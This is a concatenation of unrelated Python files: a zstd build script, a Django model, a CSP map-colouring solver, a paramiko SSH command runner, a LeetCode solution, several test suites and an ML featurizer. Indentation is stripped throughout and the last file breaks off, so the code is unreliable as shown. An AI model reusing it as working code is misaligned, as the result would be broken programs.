extra_compile_args = ["-std=c99", "-Wall", "-DFORTIFY_SOURCE=2", "-fstack-protector"]
if EXTRA_OPT:
extra_compile_args.insert(0, "-march=native")
extra_compile_args.insert(0, "-O3")
else:
extra_compile_args.insert(0, "-O2")
setup(
name='zstd001',
version=VERSION_STR,
description="ZSTD Bindings for Python (alpha)",
author='Sergey Dryabzhinsky',
author_email='sergey.dryabzhinsky@gmail.com',
url='https://github.com/sergey-dryabzhinsky/python-zstd',
packages=find_packages('src'),
package_dir={'': 'src'},
ext_modules=[
Extension('_zstd001', [
'src/zstd.c',
'src/python-zstd.c'
], extra_compile_args=extra_compile_args)
],
classifiers=[
'License :: OSI Approved :: BSD License',
'Intended Audience :: Developers',
'Programming Language :: C',
'Programming Language :: Python',
'Programming Language :: Python :: 2.6',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.2',
],
)
|
import Animal, Dog, Cat
if __name__ == '__main__':
print "Hello World!"
dogName = raw_input("\nWhat is your dog's name?" )
if dogName:
Fido = Dog.Dog(dogName)
Fido.getSound()
Fluffy = Cat.Cat("Fluffy")
Fluffy.getSound()
|
from django.db import models
from django.contrib.auth import get_user_model
User = get_user_model()
class Post(models.Model):
title = models.CharField(max_length=100, default='default title')
slug = models.TextField(default='emptyslug', unique=True)
text = models.TextField()
pub_date = models.DateTimeField("date published", auto_now_add=True)
author = models.ForeignKey(User, on_delete=models.CASCADE, related_name="Посты")
image = models.ImageField(null=True, blank=True)
class Meta:
ordering = ['-pub_date']
verbose_name = 'Пост'
verbose_name_plural = 'Посты'
|
# Copyright 2019–2020 CEA
#
# Author: Yann Leprince <yann.leprince@cea.fr>
#
# Licensed under the Apache Licence, Version 2.0 (the "Licence");
# you may not use this file except in compliance with the Licence.
# You may obtain a copy of the Licence at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the Licence is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the Licence for the specific language governing permissions and
# limitations under the Licence.
import os
import pytest
import requests
@pytest.fixture
def base_url():
url = os.environ.get('HBP_SPATIAL_BACKEND_TEST_URL')
if url:
return url
else:
# return 'https://hbp-spatial-backend.apps.hbp.eu/'
# return 'https://hbp-spatial-backend.apps-dev.hbp.eu/'
return 'http://127.0.0.1:5000/'
class TransformRequester:
def __init__(self, base_url):
self.base_url = base_url
def transform(self, source_space, target_space, points):
r = requests.post(self.base_url + 'v1/transform-points',
json={
'source_space': source_space,
'target_space': target_space,
'source_points': points,
}, headers={
'Cache-Control': 'no-cache',
})
r.raise_for_status()
response_body = r.json()
return [
(x, y, z) for (x, y, z) in response_body['target_points']
]
@pytest.fixture
def transform_requester(base_url):
return TransformRequester(base_url)
def points_approx_equal(test_points, reference_points, tol=0.1):
    # Compare every point pair, not just the first one.
    return all(
        abs(t - r) < tol
        for test_point, reference_point in zip(test_points, reference_points)
        for t, r in zip(test_point, reference_point)
    )
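def test_points_approx_equal_helper():
    # Sanity check for the helper above using synthetic points (not backend
    # output): every coordinate difference must stay below the tolerance.
    assert points_approx_equal([(0.0, 0.0, 0.0)], [(0.05, -0.05, 0.0)])
    assert not points_approx_equal([(0.0, 0.0, 0.0)], [(1.0, 0.0, 0.0)])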
def test_health(base_url):
r = requests.get(base_url + 'health',
headers={
'Cache-Control': 'no-cache',
})
assert r.status_code == 200
# Shorthands
MNI152 = 'MNI 152 ICBM 2009c Nonlinear Asymmetric'
COLIN27 = 'MNI Colin 27'
BIGBRAIN = 'Big Brain (Histology)'
INFANT = 'Infant Atlas'
TEST_POINTS_FOR_TEMPLATE = {
# All the templates can be tested with the default points (below)
}
@pytest.mark.parametrize('source_space,intermediate_space', [
(MNI152, BIGBRAIN),
(BIGBRAIN, COLIN27),
(COLIN27, INFANT),
(INFANT, MNI152),
])
def test_roundtrip(transform_requester, source_space, intermediate_space):
# Default test points
orig_points = TEST_POINTS_FOR_TEMPLATE.get(source_space, [
(0, 0, 0),
(10, 0, 0),
(0, 10, 0),
])
intermediate_points = transform_requester.transform(
source_space, intermediate_space, orig_points)
roundtripped_points = transform_requester.transform(
intermediate_space, source_space, intermediate_points)
assert points_approx_equal(roundtripped_points, orig_points)
|
from random import shuffle
class CSP:
def __init__(self, variables, domains, neighbours, constraints):
self.variables = variables
self.domains = domains
self.neighbours = neighbours
self.constraints = constraints
def backtracking_search(self):
return self.recursive_backtracking({})
def recursive_backtracking(self, assignment):
if self.is_complete(assignment):
return assignment
var = self.select_unassigned_variable(assignment)
for value in self.order_domain_values(var, assignment):
if self.is_consistent(var, value, assignment):
assignment[var] = value
results = self.recursive_backtracking(assignment)
if results is not None:
return results
assignment[var] = None
return None
def select_unassigned_variable(self, assignment):
for variable in self.variables:
if variable not in assignment:
return variable
def is_complete(self, assignment):
for variable in self.variables:
if variable not in assignment:
return False
return True
def order_domain_values(self, variable, assignment):
all_values = self.domains[variable][:]
# shuffle(all_values)
return all_values
def is_consistent(self, variable, value, assignment):
if not assignment:
return True
for constraint in self.constraints.values():
for neighbour in self.neighbours[variable]:
if neighbour not in assignment:
continue
neighbour_value = assignment[neighbour]
if not constraint(variable, value, neighbour, neighbour_value):
return False
return True
def create_australia_csp():
wa, q, t, v, sa, nt, nsw = 'WA', 'Q', 'T', 'V', 'SA', 'NT', 'NSW'
values = ['Red', 'Green', 'Blue']
variables = [wa, q, t, v, sa, nt, nsw]
domains = {
wa: values[:],
q: values[:],
t: values[:],
v: values[:],
sa: values[:],
nt: values[:],
nsw: values[:],
}
neighbours = {
wa: [sa, nt],
q: [sa, nt, nsw],
t: [],
v: [sa, nsw],
sa: [wa, nt, q, nsw, v],
nt: [sa, wa, q],
nsw: [sa, q, v],
}
def constraint_function(first_variable, first_value, second_variable, second_value):
return first_value != second_value
constraints = {
wa: constraint_function,
q: constraint_function,
t: constraint_function,
v: constraint_function,
sa: constraint_function,
nt: constraint_function,
nsw: constraint_function,
}
return CSP(variables, domains, neighbours, constraints)
if __name__ == '__main__':
australia = create_australia_csp()
result = australia.backtracking_search()
for area, color in sorted(result.items()):
print("{}: {}".format(area, color))
# Check at https://mapchart.net/australia.html
|
import re
from unittest import TestCase
import mock
from pandas import DataFrame
from shift_detector.checks.dq_metrics_check import DQMetricsCheck
from shift_detector.precalculations.store import Store
class TestDQMetricsCheck(TestCase):
def setUp(self):
sales1 = {'shift': ['A'] * 100, 'no_shift': ['C'] * 100}
sales2 = {'shift': ['B'] * 100, 'no_shift': ['C'] * 100}
numbers1 = {'cool_numbers': [1, 2, 3, 4] * 10}
numbers2 = {'cool_numbers': [1, 2, 3, 6] * 10}
self.df1 = DataFrame.from_dict(sales1)
self.df2 = DataFrame.from_dict(sales2)
self.df1_num = DataFrame.from_dict(numbers1)
self.df2_num = DataFrame.from_dict(numbers2)
self.store = Store(self.df1, self.df2)
self.store_num = Store(self.df1_num, self.df2_num)
self.check = DQMetricsCheck()
def test_init(self):
with self.subTest('normal analyzers should detect shift'):
self.check = DQMetricsCheck()
report = self.check.run(self.store_num)
explanations = report.explanation['numerical_categorical']['cool_numbers']
self.assertEqual(explanations[0].val1, 2.5)
self.assertEqual(explanations[0].val2, 3.0)
self.assertEqual(round(explanations[0].diff, 2), 0.2)
self.assertEqual(explanations[1].val1, 3.0)
self.assertEqual(explanations[1].val2, 5.0)
self.assertEqual(round(explanations[1].diff, 2), 0.67)
self.assertEqual(round(explanations[2].val1, 2), 1.13)
self.assertEqual(round(explanations[2].val2, 2), 1.89)
self.assertEqual(round(explanations[2].diff, 2), 0.67)
with self.subTest('no analyzer should detect shift'):
self.check = DQMetricsCheck(mean_threshold=.3, value_range_threshold=.68, std_threshold=.7,
categorical_threshold=.25)
report = self.check.run(self.store_num)
self.assertEqual(report.shifted_columns, [])
with self.subTest('only std should detect shift'):
self.check = DQMetricsCheck(mean_threshold=.3, value_range_threshold=.68, std_threshold=.5,
categorical_threshold=.25)
report = self.check.run(self.store_num)
explanations = report.explanation['numerical_categorical']['cool_numbers']
self.assertEqual(len(explanations), 1)
self.assertEqual(round(explanations[0].val1, 2), 1.13)
self.assertEqual(round(explanations[0].val2, 2), 1.89)
self.assertEqual(round(explanations[0].diff, 2), 0.67)
def test_run_categorical(self):
with self.subTest("Test precalculation"):
report = self.check.run(self.store)
with self.subTest("Test shifted categorical columns"):
self.assertEqual(report.shifted_columns, ['shift'])
self.assertCountEqual(report.examined_columns, ['shift', 'no_shift'])
shift_explanation = report.explanation['attribute_val']['shift'][0]
self.assertEqual(shift_explanation.val1, 1.0)
self.assertEqual(shift_explanation.val2, 0)
self.assertEqual(shift_explanation.diff, 1.0)
def test_relative_metric_difference(self):
with self.subTest('Normal case'):
self.check.data = {'numerical_comparison': {'column': {'metric_name': {'df1': 10.0, 'df2': 5.0}}}}
self.assertEqual(self.check.relative_metric_difference('column', 'metric_name')[2], -.5)
self.check.data = {'numerical_comparison': {'column': {'metric_name': {'df1': 1.2, 'df2': 12.0}}}}
self.assertEqual(self.check.relative_metric_difference('column', 'metric_name')[2], 9.0)
with self.subTest('Both values zero'):
self.check.data = {'numerical_comparison': {'column': {'metric_name': {'df1': 0, 'df2': 0}}}}
self.assertEqual(self.check.relative_metric_difference('column', 'metric_name')[2], 0)
with self.subTest('Value in df1 zero'):
self.check.data = {'numerical_comparison': {'column': {'metric_name': {'df1': 0, 'df2': 12.4}}}}
self.assertEqual(self.check.relative_metric_difference('column', 'metric_name')[2], 0)
@mock.patch('shift_detector.checks.dq_metrics_check.plt')
def test_numerical_plots_work(self, mock_plt):
self.assertFalse(mock_plt.figure.called)
report = self.check.run(self.store)
custom_plot_numerical = report.numerical_plot(DataFrame([1, 2, 3]), DataFrame([4, 5, 6]))
custom_plot_numerical()
self.assertTrue(mock_plt.figure.called)
self.assertTrue(mock_plt.figure().add_subplot.called)
self.assertTrue(mock_plt.show.called)
@mock.patch('shift_detector.checks.dq_metrics_check.plt')
def test_categorical_plots_work(self, mock_plt):
self.assertFalse(mock_plt.figure.called)
report = self.check.run(self.store)
custom_plot_categorical = report.attribute_val_plot([([1, 2, 3], [2, 4, 6], ['Heinz', 'Peter', 'Rudolf'],
'A very important plot')])
custom_plot_categorical()
self.assertTrue(mock_plt.figure.called)
self.assertTrue(mock_plt.figure().add_subplot.called)
self.assertTrue(mock_plt.show.called)
|
from typing import Union, List, Any, Optional, Tuple
import numpy as np
from dataclasses import dataclass
@dataclass
class GPVExample:
"""Data representation that can be passed to GPV `collate` functions
This representation puts the "raw" input examples for various tasks into a universal format
so examples from different task can be jointly processed, and may encompass some pre-processing,
like deciding what queries to use for an example, or tokenizing the text
"""
"""ID for this example that is unique among all datasets"""
id: str
"""Image this is for"""
image_id: Union[str, int]
"""Query (or list of queries) that can be used for this example, possibly tokenized"""
query: Union[str, List[str], List[np.ndarray]]
"""Query for deciding which boxes are relevant, used by some models to compute box ranking"""
relevance_query: Optional[str] = None
"""Crop of the image to use, in [x, y, h, w] form"""
crop: Optional[Tuple[float, float, float, float]] = None
"""Optional array of boxes that are part of the query in [x, y, w, h] form"""
query_boxes: Optional[np.ndarray] = None
"""Boxes to predict for this query, if there are any, in [x, y, h, w] form"""
target_boxes: Optional[np.ndarray] = None
"""Text to learn to generate for this example, if there is any"""
target_text: Optional[Any] = None
index_of_class: Optional[str] = None
correct_answer: Optional[str] = None
"""Meta-data about this example"""
meta: Any = None
def get_gpv_id(self):
return self.id
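def _gpv_example_sketch() -> "GPVExample":
    """Minimal construction sketch; the id, image id, query and answer below
    are hypothetical and not taken from any real dataset."""
    return GPVExample(
        id="vqa-train-000001",
        image_id="coco-000012345",
        query="What color is the cat?",
        target_text="black",
    )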
|
import os
import cv2
import numpy as np
import pandas as pd
from PIL import Image
from sklearn.decomposition import PCA
from sklearn.tree import DecisionTreeRegressor
from randomforest import Forest
def impute_NaNs(dataframe):
for key in dataframe:
if key != 'Image':
dataframe[key].fillna(dataframe[key].mean(), inplace = True)
return dataframe
def hist_equalize(img, num_bins = 256):
hist, bins = np.histogram(img.flatten(), num_bins, density=True)
cdf = hist.cumsum()
cdf = (cdf / cdf[-1]) * 255.
out_img = np.interp(img.flatten(), bins[:-1], cdf)
out_img = out_img.reshape(img.shape)
return out_img
def mirror_data(img_data, lab_data, img_h = 96, img_w = 96):
out_img_data = np.copy(img_data)
out_lab_data = np.copy(lab_data)
out_img_data = out_img_data.reshape(-1, img_h, img_w)
if np.random.rand() < 0.5:  # randomly choose between a vertical and a horizontal flip
# Vertical flip
out_img_data = out_img_data[:, ::-1]
out_lab_data[:, 1::2] = img_h - out_lab_data[:, 1::2]
else:
# Horizontal flip
out_img_data = out_img_data[:, :, ::-1]
out_lab_data[:, 0::2] = img_w - out_lab_data[:, 0::2]
out_img_data = out_img_data.reshape(-1, img_h * img_w)
return (out_img_data, out_lab_data)
def load_data(filepath, mode = 'train', preprocess_flag = True, normalize_flag = False):
print('Load started with mode {}'.format(mode))
dataframe = pd.read_csv(filepath, header = 0)
if mode == 'train':
print('Handling NaNs...')
if preprocess_flag:
dataframe = impute_NaNs(dataframe)
else:
dataframe = dataframe.dropna()
img_data = dataframe['Image'].apply(lambda im: np.fromstring(im, sep = ' '))
img_data = np.vstack(img_data.values).astype(np.float32)
if preprocess_flag:
print('Equalizing histograms...')
for idx in range(len(img_data)):
img_data[idx] = hist_equalize(img_data[idx])
if normalize_flag:
print('Normalizing data...')
img_data -= np.mean(img_data, axis = 0)
img_data /= np.std(img_data, axis = 0)
if mode == 'train':
lab_data = dataframe.drop(['Image'], axis = 1)
lab_data = lab_data.values.astype(np.float32)
if preprocess_flag:
print('Performing data augmentation...')
img_data_aug, lab_data_aug = mirror_data(img_data, lab_data)
img_data = np.vstack((img_data, img_data_aug))
lab_data = np.vstack((lab_data, lab_data_aug))
else:
lab_data = None
print('Load completed with mode {}'.format(mode))
return (img_data, lab_data)
def display(img_data, lab_data, img_h = 96, img_w = 96):
num_points = int(len(lab_data[0]) / 2)
img_data = img_data.reshape(-1, img_h, img_w)
color = (0, 0, 255)
for img, lab in zip(img_data, lab_data):
img = img.astype(np.uint8)
test = Image.fromarray(img)
img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR)
for idx in range(num_points):
x, y = int(lab[idx * 2]), int(lab[idx * 2 + 1])
cv2.putText(img, str(idx), (x, y), cv2.FONT_HERSHEY_SIMPLEX, 0.25, color, 1)
img = img[:, :, ::-1]
img = Image.fromarray(img)
img.show()
input('Enter any key...')
def main():
np.random.seed(1)
print('Loading data...')
train_data = load_data('./kaggle_data/training.csv', mode = 'train', preprocess_flag = False)
test_data = load_data('./kaggle_data/test.csv', mode = 'test', preprocess_flag = False)
X_train, Y_train = train_data[0], train_data[1]
X_test, _ = test_data[0], test_data[1]
inp_data = np.copy(X_test)
print('Performing PCA...')
pca = PCA(n_components = 23, svd_solver='randomized')
X_train = pca.fit_transform(X_train)
# Project the test set with the PCA fitted on the training data instead of refitting on it.
X_test = pca.transform(X_test)
print('Creating Random Forest Regressor...')
# Uncomment to try sklearn's decision tree regressor
# regressor = DecisionTreeRegressor(max_depth = 10)
# regressor.fit(X_train, Y_train)
regressor = Forest(num_trees = 1, mode = 'regression')
regressor.fit(X_train, Y_train)
print('Generating test predictions...')
Y_test = regressor.predict(X_test)
display(inp_data[-10:], Y_test[-10:])
if __name__ == '__main__':
main()
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from __future__ import print_function
import sys
import os
import paramiko
class sshcmd():
def __init__(self, server, username, password, port=22,
hostkey_file="~/.ssh/known_hosts",
mode="pwd", pkey_file="~/.ssh/id_rsa", debug=False):
'''
mode: "pwd" or "rsa"
pkey_file: valid if mode is "rsa"
'''
if debug:
paramiko.common.logging.basicConfig(level=paramiko.common.DEBUG)
hostkey_file = os.path.expanduser(hostkey_file)
self.ssh = paramiko.SSHClient()
self.ssh.load_system_host_keys(hostkey_file)
#
if mode == "rsa":
pkey_file = os.path.expanduser(pkey_file)
pkey = paramiko.RSAKey.from_private_key_file(pkey_file,
password=password)
self.ssh.connect(server, port=port,
username=username,
pkey=pkey,
allow_agent=False,
timeout=15, auth_timeout=15)
elif mode == "pwd":
self.ssh.connect(server, port=port,
username=username,
password=password,
allow_agent=False,
timeout=15, auth_timeout=15)
else:
raise Exception("ERROR: invalid mode %s" % mode)
def execcmd(self, cmd):
return self.ssh.exec_command(cmd)
def close(self):
return self.ssh.close()
if __name__ == "__main__" :
if len(sys.argv) < 5:
print("Usage: %s (server) (username) (password) (cmd...)" %
(sys.argv[0]))
exit(1)
#
server = sys.argv[1]
username = sys.argv[2]
password = sys.argv[3]
#
ssh = sshcmd(server, username, password, debug=True)
ssh_stdin, ssh_stdout, ssh_stderr = ssh.execcmd(" ".join(sys.argv[4:]))
#
print("STDIN:", type(ssh_stdin))
print("STDOUT:", type(ssh_stdout))
print("STDERR:", type(ssh_stderr))
print("====")
#
for line in ssh_stdout:
print(line.rstrip())
#
ssh.close()
|
from typing import List
#
# @lc app=leetcode id=682 lang=python3
#
# [682] Baseball Game
#
# @lc code=start
class Solution:
def calPoints(self, ops: List[str]) -> int:
result: List[int] = []
for s in ops:
if s == "C":
result.pop()
elif s == "+":
s1 = result.pop()
s2 = result.pop()
result.append(s2)
result.append(s1)
result.append(s1 + s2)
elif s == "D":
s1 = result.pop()
result.append(s1)
result.append(s1 * 2)
else:
result.append(int(s))
return sum(result)
# @lc code=end
if __name__ == "__main__":
s = Solution()
ops = ["5", "-2", "4", "C", "D", "9", "+", "+"]
print(s.calPoints(ops))
|
from ebl.corpus.domain.chapter import make_title
from ebl.transliteration.domain.markup import StringPart
from ebl.transliteration.domain.translation_line import TranslationLine
TRANSLATION = (
TranslationLine([StringPart("not the title")], "de"),
TranslationLine([StringPart("the title,")], "en"),
)
def test_make_title() -> None:
assert make_title(TRANSLATION) == (StringPart("The Title"),)
|
"""
@author: TD gang
Set of classes that override basic classes like dict
to add specific behaviour
"""
from __future__ import annotations
import copy
from typing import TYPE_CHECKING, Any
# Forward references
if TYPE_CHECKING:
from silex_client.action.action_query import ActionQuery
class ReadOnlyError(Exception):
"""
Simple exception for the readonly datatypes
"""
pass
class ReadOnlyDict(dict):
"""
Pointer to an editable dict. It allows to read its data but not to edit it
"""
@staticmethod
def __readonly__(*args, **kwargs) -> None:
raise ReadOnlyError("This dictionary is readonly")
def __copy__(self) -> ReadOnlyDict:
cls = self.__class__
return cls(copy.copy(dict(self)))
def __deepcopy__(self, memo) -> ReadOnlyDict:
cls = self.__class__
return cls(copy.deepcopy(dict(self), memo))
__setitem__ = __readonly__
__delitem__ = __readonly__
pop = __readonly__
clear = __readonly__
update = __readonly__
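def _readonly_dict_example() -> None:
    """Minimal usage sketch (illustrative, not part of the original API):
    reads behave like a normal dict while any mutation raises ReadOnlyError."""
    settings = ReadOnlyDict({"project": "demo", "frame_rate": 25})
    assert settings["project"] == "demo"
    try:
        settings["frame_rate"] = 30
    except ReadOnlyError:
        pass  # expected: the dictionary is readonly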
class CommandOutput(str):
"""
Helper to differentiate the strings that come from a command output
"""
def __init__(self, *args, **kwargs):
super().__init__()
splited_path = self.split(":")
# Initialize attributes
self.step = None
self.command = splited_path[0]
self.output_keys = []
# If the user specified more than just the command name
if len(splited_path) > 1:
# Get the step and the command
self.command = splited_path[1]
self.step = splited_path[0]
# The output keys are in case the command returns a dict
# The user can get a particular value in the dict
for key in splited_path[2:]:
self.output_keys.append(key)
def get_command_path(self):
"""
Get the path to get the command with the method ActionQuery::get_command
"""
if self.step is not None:
return f"{self.step}:{self.command}"
return self.command
def rebuild(self) -> CommandOutput:
"""
Since strings are immutable, modifying the step or command attributes
requires rebuilding the string entirely.
TODO: Recreate a class that contains a string instead of inheriting from it.
We keep this for now to preserve string features like JSON serialisability,
but it is not ideal.
"""
return CommandOutput(":".join([self.get_command_path(), *self.output_keys]))
def get_value(self, action_query: ActionQuery) -> Any:
"""
Get the actual returned value of the command this path is pointing to
"""
command = action_query.get_command(self.get_command_path())
value = command.output_result if command is not None else None
for key in self.output_keys:
if isinstance(value, dict):
value = value.get(key, {})
if isinstance(value, CommandOutput):
return value.get_value(action_query)
return value
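def _command_output_example() -> None:
    """Illustrative parsing sketch; "export:write_file:path" is a hypothetical
    path, not a command from a real action."""
    out = CommandOutput("export:write_file:path")
    assert out.step == "export"
    assert out.command == "write_file"
    assert out.output_keys == ["path"]
    assert out.get_command_path() == "export:write_file"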
|
#!/usr/bin/env python3
#
# Copyright (C) 2016 Dmitry Marakasov <amdmi3@amdmi3.ru>
#
# This file is part of repology
#
# repology is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# repology is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with repology. If not, see <http://www.gnu.org/licenses/>.
import unittest
import repology.config
from repology.package import Package
from repology.repoman import RepositoryManager
class TestParsers(unittest.TestCase):
def setUp(self):
self.maxDiff = None
repoman = RepositoryManager(repology.config.REPOS_DIR, 'testdata')
self.packages = repoman.ParseMulti(reponames=['have_testdata'])
def check_package(self, name, reference):
reference_with_default = {
# repo must be filled
# family must be filled
'subrepo': None,
# name must be filled
'effname': None,
# version must be filled
'origversion': None,
'effversion': None,
'versionclass': None,
'maintainers': [],
'category': None,
'comment': None,
'homepage': None,
'licenses': [],
'downloads': [],
'ignore': False,
'shadow': False,
'ignoreversion': False,
'extrafields': {},
}
reference_with_default.update(reference)
def sort_lists(what):
output = {}
for key, value in what.items():
if isinstance(value, list):
output[key] = sorted(value)
else:
output[key] = value
return output
for package in self.packages:
if package.name == name:
self.assertEqual(
sort_lists(package.__dict__),
sort_lists(reference_with_default)
)
return
self.fail('package not found')
def test_freebsd(self):
self.check_package(
'vorbis-tools',
{
'repo': 'freebsd',
'family': 'freebsd',
'name': 'vorbis-tools',
'version': '1.4.0',
'origversion': '1.4.0_10,3',
'category': 'audio',
'comment': 'Play, encode, and manage Ogg Vorbis files',
'maintainers': ['naddy@freebsd.org'],
'homepage': 'http://www.vorbis.com/',
'extrafields': {
'portname': 'vorbis-tools',
'origin': 'audio/vorbis-tools',
}
}
)
def test_gentoo(self):
self.check_package(
'chromium-bsu',
{
'repo': 'gentoo',
'family': 'gentoo',
'name': 'chromium-bsu',
'version': '0.9.15.1',
'origversion': None,
'category': 'games-action',
'maintainers': ['games@gentoo.org'],
'homepage': 'http://chromium-bsu.sourceforge.net/',
'comment': 'Chromium B.S.U. - an arcade game',
'downloads': ['mirror://sourceforge/chromium-bsu/chromium-bsu-0.9.15.1.tar.gz'],
'licenses': ['Clarified-Artistic'],
}
)
self.check_package(
'asciinema',
{
'repo': 'gentoo',
'family': 'gentoo',
'name': 'asciinema',
'version': '1.3.0',
'origversion': None,
'category': 'app-misc',
'maintainers': ['kensington@gentoo.org'],
'homepage': 'https://asciinema.org/', # ['https://asciinema.org/', 'https://pypi.python.org/pypi/asciinema']
'comment': 'Command line recorder for asciinema.org service',
'downloads': ['https://github.com/asciinema/asciinema/archive/v1.3.0.tar.gz'],
'licenses': ['GPL-3+'],
}
)
self.check_package(
'away',
{
'repo': 'gentoo',
'family': 'gentoo',
'name': 'away',
'version': '0.9.5',
'origversion': '0.9.5-r1',
'category': 'app-misc',
'maintainers': ['maintainer-needed@gentoo.org'], # note this is generated by repoman from repo config
'homepage': 'http://unbeatenpath.net/software/away/',
'comment': 'Terminal locking program with few additional features',
'downloads': ['http://unbeatenpath.net/software/away/away-0.9.5.tar.bz2'],
'licenses': ['GPL-2'],
}
)
self.check_package(
'aspell',
{
'repo': 'gentoo',
'family': 'gentoo',
'name': 'aspell',
'version': '0.60.7_rc1',
'category': 'app-test',
'maintainers': ['maintainer-needed@gentoo.org'], # note this is generated by repoman from repo config
'homepage': 'http://aspell.net/',
'comment': 'A spell checker replacement for ispell',
'downloads': ['mirror://gnu-alpha/aspell/aspell-0.60.7-rc1.tar.gz'],
'licenses': ['LGPL-2'],
}
)
def test_arch(self):
self.check_package(
'zlib',
{
'repo': 'arch',
'family': 'arch',
'subrepo': 'core',
'name': 'zlib',
'version': '1.2.8',
'origversion': '1:1.2.8-7',
'comment': 'Compression library implementing the deflate compression method found in gzip and PKZIP',
'homepage': 'http://www.zlib.net/',
'licenses': ['custom'],
'maintainers': ['pierre@archlinux.de'],
}
)
def test_cpan(self):
self.check_package(
'Acme-Brainfuck',
{
'repo': 'cpan',
'family': 'cpan',
'name': 'Acme-Brainfuck',
'version': '1.1.1',
'maintainers': ['jaldhar@cpan'],
'homepage': 'http://search.cpan.org/dist/Acme-Brainfuck/',
'shadow': True,
}
)
def test_debian(self):
self.check_package(
'a52dec',
{
'repo': 'debian_unstable',
'subrepo': 'main',
'category': 'devel',
'family': 'debuntu',
'name': 'a52dec',
'version': '0.7.4',
'origversion': '0.7.4-18',
'maintainers': [
'pkg-multimedia-maintainers@lists.alioth.debian.org',
'dmitrij.ledkov@ubuntu.com',
'sam+deb@zoy.org',
'siretart@tauware.de',
],
'homepage': 'http://liba52.sourceforge.net/',
}
)
def test_gobolinux(self):
self.check_package(
'AutoFS',
{
'repo': 'gobolinux',
'family': 'gobolinux',
'name': 'AutoFS',
'version': '5.0.5',
'comment': 'Automounting daemon',
'homepage': 'ftp://ftp.kernel.org/pub/linux/daemons/autofs/',
'downloads': [
'http://www.kernel.org/pub/linux/daemons/autofs/v5/autofs-5.0.5.tar.bz2'
],
'licenses': ['GNU General Public License (GPL)'],
'maintainers': ['fallback-maintainer-gobolinux@repology'] # note this is generated by repoman
}
)
def test_slackbuilds(self):
# multiline DOWNLOAD
self.check_package(
'virtualbox',
{
'repo': 'slackbuilds',
'family': 'slackbuilds',
'name': 'virtualbox',
'version': '5.0.30',
'category': 'system',
'homepage': 'http://www.virtualbox.org/',
'downloads': [
'http://download.virtualbox.org/virtualbox/5.0.30/SDKRef.pdf',
'http://download.virtualbox.org/virtualbox/5.0.30/UserManual.pdf',
'http://download.virtualbox.org/virtualbox/5.0.30/VBoxGuestAdditions_5.0.30.iso',
'http://download.virtualbox.org/virtualbox/5.0.30/VirtualBox-5.0.30.tar.bz2',
],
'maintainers': ['pprkut@liwjatan.at'],
}
)
# different DOWNLOAD and DOWNLOAD_x86_64
self.check_package(
'baudline',
{
'repo': 'slackbuilds',
'family': 'slackbuilds',
'name': 'baudline',
'version': '1.08',
'category': 'ham',
'homepage': 'http://www.baudline.com/',
'downloads': [
'http://www.baudline.com/baudline_1.08_linux_i686.tar.gz',
'http://www.baudline.com/baudline_1.08_linux_x86_64.tar.gz',
],
'maintainers': ['joshuakwood@gmail.com'],
}
)
# DOWNLOAD_x86_64 is UNSUPPORTED
self.check_package(
'teamviewer',
{
'repo': 'slackbuilds',
'family': 'slackbuilds',
'name': 'teamviewer',
'version': '12.0.76279',
'category': 'network',
'homepage': 'https://www.teamviewer.com/',
'downloads': [
'https://download.teamviewer.com/download/teamviewer_i386.deb',
],
'maintainers': ['willysr@slackbuilds.org'],
}
)
# DOWNLOAD is UNSUPPORTED
self.check_package(
'oracle-xe',
{
'repo': 'slackbuilds',
'family': 'slackbuilds',
'name': 'oracle-xe',
'version': '11.2.0',
'category': 'system',
'homepage': 'http://www.oracle.com/technetwork/database/database-technologies/express-edition/overview/index.html',
'downloads': [
'http://download.oracle.com/otn/linux/oracle11g/xe/oracle-xe-11.2.0-1.0.x86_64.rpm.zip',
],
'maintainers': ['slack.dhabyx@gmail.com'],
}
)
# DOWNLOAD_x86_64 is UNTESTED
self.check_package(
'kforth',
{
'repo': 'slackbuilds',
'family': 'slackbuilds',
'name': 'kforth',
'version': '1.5.2p1',
'category': 'development',
'homepage': 'http://ccreweb.org/software/kforth/kforth.html',
'downloads': [
'ftp://ccreweb.org/software/kforth/linux/kforth-x86-linux-1.5.2.tar.gz',
],
'maintainers': ['gschoen@iinet.net.au'],
}
)
if __name__ == '__main__':
unittest.main()
|
from __future__ import division
from __future__ import unicode_literals
from __future__ import print_function
from __future__ import absolute_import
import logging
import os
import re
from typing import Any, Dict, List, Optional, Text
from rasa_nlu_gao import utils
from rasa_nlu_gao.featurizers import Featurizer
from rasa_nlu_gao.training_data import Message
from rasa_nlu_gao.components import Component
from rasa_nlu_gao.model import Metadata
import numpy as np
logger = logging.getLogger(__name__)
class WordVectorsFeaturizer(Featurizer):
name = "intent_featurizer_wordvector"
provides = ["text_features"]
requires = ["tokens"]
defaults = {
"vector": None,
"elmo": None,
"limit": None
}
@classmethod
def required_packages(cls):
# type: () -> List[Text]
return ["gensim", "numpy", "torch"]
def __init__(self, component_config=None, model=None, category=None):
"""Construct a new count vectorizer using the sklearn framework."""
super(WordVectorsFeaturizer, self).__init__(component_config)
self.model = model
self.category = category
@classmethod
def create(cls, cfg):
component_conf = cfg.for_component(cls.name, cls.defaults)
vector_file = component_conf.get("vector")
elmo_file = component_conf.get("elmo")
if not vector_file and not elmo_file:
raise Exception("The WordVectorsFeaturizer component needs "
"the configuration value either word2vec vector or elmo model.")
if vector_file:
import gensim
model = gensim.models.KeyedVectors.load_word2vec_format(vector_file, binary=False, limit=component_conf.get("limit"))
category = 'word2vec'
elif elmo_file:
from rasa_nlu_gao.models.elmo_cn import Embedder
model = Embedder(elmo_file)
category = 'elmo'
return WordVectorsFeaturizer(component_conf, model, category)
@staticmethod
def _replace_number(text):
return re.sub(r'\b[0-9]+\b', '0', text)
def _chunk_max_pooling(self,data):
import torch
import torch.nn as nn
all_data = np.zeros((len(data), data[0].shape[1]), dtype=np.float32)
for i in range(len(data)):
stride = data[i].shape[0]
